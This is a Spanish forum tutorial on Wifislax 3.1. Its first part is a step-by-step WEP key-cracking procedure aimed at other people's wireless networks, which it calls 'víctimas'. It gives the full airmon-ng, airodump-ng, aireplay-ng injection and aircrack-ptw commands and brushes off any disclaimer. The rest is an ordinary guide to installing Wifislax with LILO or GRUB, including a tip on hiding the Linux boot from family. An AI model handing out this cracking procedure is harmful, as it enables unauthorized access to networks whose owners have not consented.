TUTORIAL: Auditoria Wireless Wifislax, saca claves WEP de redes

inalámbricas

TUTORIAL - AUDITORIA WIRELESS CON WIFISLAX

Bueno chavos, pues aquí les traigo un tuto para hacer auditoria wireless
con wifislax 3.1, lo siguiente

es una recopilación de los pasos que se deben seguir para lograrlo

satisfactoriamente.

El "tutorial" original se encuentra en el siguiente link:

http://foro.seguridadwireless.net/in...ic,4528.0.html

De ahí he tomado la idea basica y las fotografías también aunque subidas

desde otro servidor, le he

agregado detalles ya que en ese "tutorial" no se explica nada a detalle y es

poco entendible para

algunos.

Falta decir que ni yo ni la página nos hacemos responsables de bla, bla,

bla, bla....

FAQ:

Para qué sirve la auditoria wireless?

Para inyectar paquetes a un punto de acceso y así poder obtener la clave
WEP de los mismos.

Sirve para los módem infinitum?

Sí, si sirve.

Todas las tarjetas wlan son compatibles?

No, no todas sirven para inyección, te tocará buscar alguna que lo sea.

Empezemos
Lo que necesitamos:

- Wifislax 3.1 (Descargalo desde aquí)

- PC con tarjeta de red inalámbrica compatible
- 10 mins de tu tiempo y un poco de paciencia
- Conocer la dirección MAC de tu wlan.
- Pluma y papel.

Procedimiento:

Después de bajar el iso lo queman con el Nero, así les quedara un bonito
live cd de linux. (Ya deberían

saber como se queman los iso)

Ahora ya con nuestro disco de wifislax lo insertamos en la pc e iniciamos

desde el cd-rom, después de

unos minutos y de una o dos opciones que te aparecen, seguir unas

cuantas indicaciones te loggeas e

inicias el entorno gráfico (Es muy fácil por eso no doy detalles).

Ya en el wifislax le das en el icono del escritorio "Shell" y te abre una

ventana parecida al MS-DOS a

la cual le llamaremos "Consola" de ahora en adelante.

Ya en la empezaremos checando las tarjetas wlan con el siguiente

comando:

iwconfig

Te aparecen las tarjetas que tienes instaladas en el sistema, entre ellas la

que utilizarás, yo utilizo

una alfa network de 500mw y me basaré en ella.

Una vez identificada tu tarjeta se procede a correr el modo monitor con el

siguiente comando:

airmon-ng start wlan0 6

Atención: Con este comando se inicia el modo monitor en el canal 6, si

deseas utilizar otro canal para

detectar otras redes puedes sustituir el 6 por cualquier otro número.

Cliquea esta barra para ver la imagen

completa.
Después de activado el modo monitor empezaremos a detectar redes en
este caso en el canal 6.

airodump-ng -w aaaa -c6 wlan0 (Aquí mismo sustituyes -c6 por el canal
que tú quieras) (El aaaa es un

nombre de archivo elegido por tí, se puede llamar hola si tú quieres)

Cliquea esta barra para ver la imagen

completa.

Escoges alguna red con encriptación WEP, abres una nueva consola y
escribes lo siguiente:

aireplay-ng -1 30 -e XXXX -a MACV -h MACC wlan0

Ahora explico el comando:

XXXX - Aquí va el ESSID de tu victima

MACV - Aquí va la dirección MAC de tu víctima
MACC - Aquí debes introducir la dirección MAC de tu wlan.

Quedaría más o menos así:

aireplay-ng -1 30 -e INFINITUMXXX -a 00:00:00:00:00 -h 00:00:00:01

wlan0

Con esto tu tarjeta quedará asociada con el punto de acceso víctima

Cliquea esta barra para ver la imagen

completa.
Ahora empezaremos a inyectar paquetes usando el siguiente comando:

aireplay-ng -3 -x600 -b MACV -h MACC wlan0 (En este momento ya debes

saber donde vas a sustituir y con

que)

Quedaría más o menos así:

aireplay-ng -3 -x600 -b 00:00:00:00:00 -h 00:00:00:00:01 wlan0

Después de esto los paquetes empezarán a ser enviados.

Cliquea esta barra para ver la imagen

completa.

Después de sobrepasados los 100,000 paquetes enviados se procede a

obtener la clave:

Abres una nueva consola y escribes lo siguiente:

aircrack-ptw aaaa-01.cap (Aquí se utiliza el nombre de archivo que

especificamos casi al principio al

correr el airodump más el -01 o cualquier otro número -02, -03 etc...)

Cliquea esta barra para ver la imagen

completa.
Apuntas la clave WEP y listo.

CUALQUIER DUDA O CORRECIÓN SON BIEN RECIBIDOS.

A VER SI LO VE UN MOD Y LO PONE EN TUTORIALES

…………………………………………….

………………………………………

…………………………….

1.- Wifislax 3.1 desde USB

2.- Conseguido wifislax instalado en USB - NO modo LIVEUSB

sino instalación completa

Nos vamos a basar en varios titulares que se publicaron en el foro de

seguridadwireless.net, y es allí donde podéis plantear vuestras dudas
y problemas.

Usaremos básicamente dos aplicaciones que podemos encontrar en el

menú de wifislax, los instaladores y el gtparted.
En la primera parte presentaremos el método de instalación
mediante arranque con lilo y en la segunda parte el método de
instalación mediante arranque con grub, para ambos métodos
la gestión de las particiones es exactamente las mismas, así
cual recomiendo que leáis todo el manual antes de empezar a
instalar wifislax.

También explicaremos como conseguir un live-usb, es decir

que wifislax se ejecute en vuestro pendrive de 1GB.
Recomiendo leer: Wifislax 3.1 desde USB        Manual directo
liveusb

Instalación con cargador de arranque LILO

Arranque Lilo sin windows

Arranque Lilo con windows
Nota: los instaladores para usar como arranque LILO, están
actualizados al igual que el instalador para arranque con grub, pero el
tamaño real para que wifislax pueda trabajar perfectamente instalado
en el disco duro no es 2.7GB sino 4GB, eso es lo mínimo que se
necesita, si bien se aconseja un poquito más para guardar las
capturas y ficheros temporales para la auditoria wireless. El programa
de instalación básico es decir la opción que nos deja copiar todo el
contenido de wifislax al disco si esta actualizada la información:

Y inicialmente preparemos las particiones si queremos con el

Qtparted, corresponderá a la misma captura anterior pero pinchando
en "Herramientas disco duro". Aunque el tratamiento de
particiones lo podéis hacer desde Windows con las herramientas que
mas os gusten.

Manual de unbas (redactado por lo tanto en primera persona)

Imagen del Qtparted y del instalador del Wifislax, para que os

animéis a instalarlo.
Deciros que son perfectamente compatibles WifiSlax y Windows si lo
hacéis bien.

Partiendo de disco HDA en el cual tenemos podemos tener tres

particiones :

HDA—— |__hda1 = Windows

      |
            |__hda2 = Wifislax
      |
            |__hda3 = Swap ( Para el intercambio )

En caso de duda de los puntos de montaje de los pendrives podemos

usar el comando fdisk -l para determinar que dispositivos externos y
internos de almacenamiento tenemos, sean disco duros IDE o SATA,
lectores DVD-CDROM, grabadores y lógicamente pendrives (llaveros
usb).

Ahora donde pone fuente es el sitio donde tienes la liveCD metida en

este caso : /Boot

El siguiente paso te pide donde guardar el Wifislax ( en mi caso en el

hda2 )

En el tercer paso nos pregunta donde escribir el MBR, pues será en el

sistema principal con lo cual en la raíz del disco duro ( en mi caso es
en hda )

Ahora para que no haya problemas con el Windows como en la

versión anterior (1.1) y así evitarnos tener que andar tocando el
lilo.conf, nos pide que le digamos donde tenemos instalado el
Windows, ( pues en su caso es hda1 ).

Unos minutos de instalación y tenemos todo perfecto.

Bastaría añadir por mi parte que el paso cuando nos pregunta donde
escribir el MBR, pues podemos decirle que lo haga sobre /dev/fd0,
que corresponde a la disquetera, siempre que este montada y con un
disquete limpio.

Esto es importante porque así, no nos tocara el arranque de

Windows, es decir sin el disquete, lo que arrancara siempre será
Windows, y con el disquete lo hará con lilo y te dejara elegir o win o
con linux.

Porque esto es tan importante, pues muy fácil, si tenemos guardado

ese disquete, podemos tener semioculto lo que estamos haciendo en
linux. Por si tenemos algún hermano que lo toca todo.
A continuación un ejemplo mas de como personalmente tengo yo mi
disco duro particionado y que tuve que poner en el instalador:

Cualquier formateo o modificación de particiones, hacerlas con los

dispositivos desmontados, y si son varias acciones de
reparticionamiento y formateo las que tenemos que realizar, pues
casi mejor reiniciar el sistema con la live CD entre una acción y otra.
Y salvar cambios antes de salir del Qtparted.

Pero, después volver a montar la partición donde vamos a instalar

Wifislax, ojo esto es muy importante, y no hay que olvidarlo.

/dev/hdba: No encontrareis en este caso el disco duro Master de la

primera controladora IDE, porque simplemente esta desconectada la
fuente de alimentación, ese disco nunca lo conecto a Internet.

/dev/hdb1: Partición de Windows.

/dev/hdb5: Partición para el intercambio de memoria SWAP, como

veis es una burrada (1.8GB) pero la necesito así para el trabajo de
creación del live CD. En vuestro caso fijarla igual a la RAM que
tengáis en vuestro equipo.

/dev/hdb4: Es la que uso para crear los nuevos livecd.

/dev/hdb2: Con tanta partición se me quedo esa entremedio.

/dev/hdb3: Donde instalare el Wifislax, fijaros que esta como

partición activa.
Por lo tanto solo es importante las particiones /dev/hdb3 y
/dev/hdb5 en vuestro caso. Supongo que además tendréis también
el Windows, en mi caso /dev/hdb1. Que son las tres mismas que
citaba Unbas en su manual, a excepción que en mi caso son otros
números y otras letras. Lo importante es saber que es cada cosa.

¿que tengo que poner en el instalador de Wifislax?

Fuente: /boot (para versiones 3.0 no hace falta)

Instalar Wifislax en: /mnt/hdb3

Escribir MBR: /dev/hdb (que es el disco duro donde estará

instalado, independiente  donde se grabe Wifislax, ya que el sector de
arranque es único para cada disco duro, podéis seleccionar cualquier
otro dispositivo)

Partición en Windows: /dev/hdb1. Le digo que es ahí donde

tengo el SO Windows.

En esos campos siempre os aparecerá un listbox editable.

Nota: los instaladores para usar como arranque LILO, están
actualizados al igual que el instalador para arranque con grub, pero el
tamaño real para que wifislax pueda trabajar perfectamente instalado
en el disco duro no es 2.7GB sino 4GB, eso es lo mínimo que se
necesita, si bien se aconseja un poquito más para guardar las
capturas y ficheros temporales para la auditoria wireless.

Selecciono instalación real y basta con pinchar en Instalar para que

se haga todo el proceso automático.

Si hubiera algún problema posterior en el arranque siempre podemos

reconfigurar el /etc/lilo.conf y realizar alguna serie de maniobras. De
la misma forma en el proceso seguro que se copiaron los ficheros
correctamente, y con algunos comandos en shell podemos resolver el
problema, sin necesidad de reinstalarlo todo ni de formatear y
reparticionar todo el disco duro, y recuperar el propio Windows.
Siempre es mejor preguntar en el foro el problema que no perder los
nervios y dar por pensado que hemos destruido el Windows.
¿Que hacemos cuando tenemos problemas con el instalador de
Wifislax?

Pensar que a lo mejor estáis instalando Wifislax en un dispositivo

USB (pendrive) y que seguramente este dispositivo no tenga una
capacidad de 2700MB por lo tanto usar la instalación comprimida
(700MB).

¡ Fijaros bien las opciones que habéis elegido antes de pinchar

en "Instalar" !

¿Que pasa si en modo live CD hemos necesitado de los

cheatcodes para no tener problemas de arranque?

 ¿Como pasamos esas opciones en la instalación?

Vease un ejemplo:

boot = /dev/sda
prompt
timeout = 80
bitmap=/mnt/sda5/boot/splash.bmp
change-rules
reset
vga = 0x317
default = Windows
image = /mnt/sda5/boot/vmlinuz
root = /dev/sda5
initrd = /mnt/sda5/boot/splash.initrd
label = Wifislax
append="nopcmcia"
read-write
other = /dev/sda2
label = Windows

En este caso correspondía al cheatcode del arranque:

boot: ws nopcmcia

Nota: Al iniciar el arranque de wifislax, justo antes de cargar

el arranque por lilo podemos usar la tecla [TAB] y modificar
ciertas características por ejemplo añadir temporalmente
cheatcodes y modificar resolución de pantalla.

Instalación con cargador de arranque GRUB

Antes de leer esta sección os recomiendo que hayáis leído todo lo

anterior, porque en el manual de arranque por grub se hace mención
a la gestión de las particiones, lo cual es valido para este método, y
no solo para wifislax sino para cualquier distribución linux live-cd en
general.

Esta opción es la mas recomendable.

Una vez preparadas las particiones accedemos al menú y

seleccionamos "Sistema":
Seleccionaos Instalador de wifislax:

y arranque con grub:

Paso 1: El primer paso copiara e instalara todo el contenido de

wifislax en el disco.
  

Solo tenemos que indicar el punto de montaje de la partición donde

se instalar wifislax, además de la primera instalación siempre
podemos volver a usarlo por si queremos volver a la instalación
inicial, sin tener que tocar, sea el arrancador por LILO o por GRUB

Paso 2: Configurar GRUB

Dejamos la opción por defecto "simple".

Hemos limitado la configuración a esa resolución, pero puede ser

modificado posteriormente modificando el fichero
/boot/grub/menu.lst, yo personalmente prefiero 1024 x 768 y
correspondería a vga=791
Indicamos la partición donde queremos instalar wifislax.

Por defecto sale la opción ROOT;

así pues indicamos MBR para la configuración de GRUB.

Indica el disco donde se instalar el MBR, en el mismo disco donde la

partición que se instalo wifislax, habitualmente se puede dejar en
blanco, porque el propio configurador ya lo asigna perfectamente.
Nos saldrán varios avisos.

Y si todo fue bien se termina el proceso de configuración,

donde nos muestra la dirección donde se generaron los archivos
necesarios para el arranque con grub.

El archivo importante es menu.lst:

el cual podemos modificar a gusto, si bien tal como queda es mas
que suficiente, pero por ejemplo se puede colocar vga=791 tal como
explique anteriormente.

El titulo Wifislax 3.0 debería ser Wifislax 3.1, lo cual también se

puede editar, vemos que están las entradas para Windows y todos los
linux que tengo en mi ordenador. La entrada importarte

es:

title wifislax 3.0

root (hd0,0)

kernel ...............

initrd ..............
save default

que corresponde al wifislax 3.1 que hemos instalado en /mnt/hdb1,

grub mantiene su propia sintaxis respecto a la numeración de
particiones. hdb1=hd0,0

Todo este proceso ha sido automático y no hemos tenido que copiar

nada, solo indicar la información pertinente donde debemos instalar y
configurar wifislax, y a partir de hache se generaron todos los
ficheros necesarios, esta proceso, es decir esta script de
configuración han sido reelaborada  por hadrianweb para ser
especifica de wifislax.

Paso 3: es aquí realmente donde añadimos físicamente el

arranque por GRUB al disco duro.

Nota: acabo de ver un error en las etiquetas, logicamente

dispositivo, correspondería a partición donde se instalo wifislax, y
wireless al disco donde queremos añadir en su MBR el grub, y nadie
comento nada al respecto.

¿de que forma afectará los cheatcodes ?

Es simple, lo único que hay que hacer es añadir el cheatcode sin nada al final.

Un ejemplo para el nopcmcia:

title Wifislax 3.1

  root (hd0,1)
  kernel /boot/vmlinuz root=/dev/sda2 ro vga=791 splash=silent showopts
nopcmcia
 initrd /boot/splash.initrd
   savedefault
 

Los valores de sda2 y (hd0,1) pueden ser diferentes para cada

persona, pero fijaros la forma de colocar el cheatcode nopcmcia.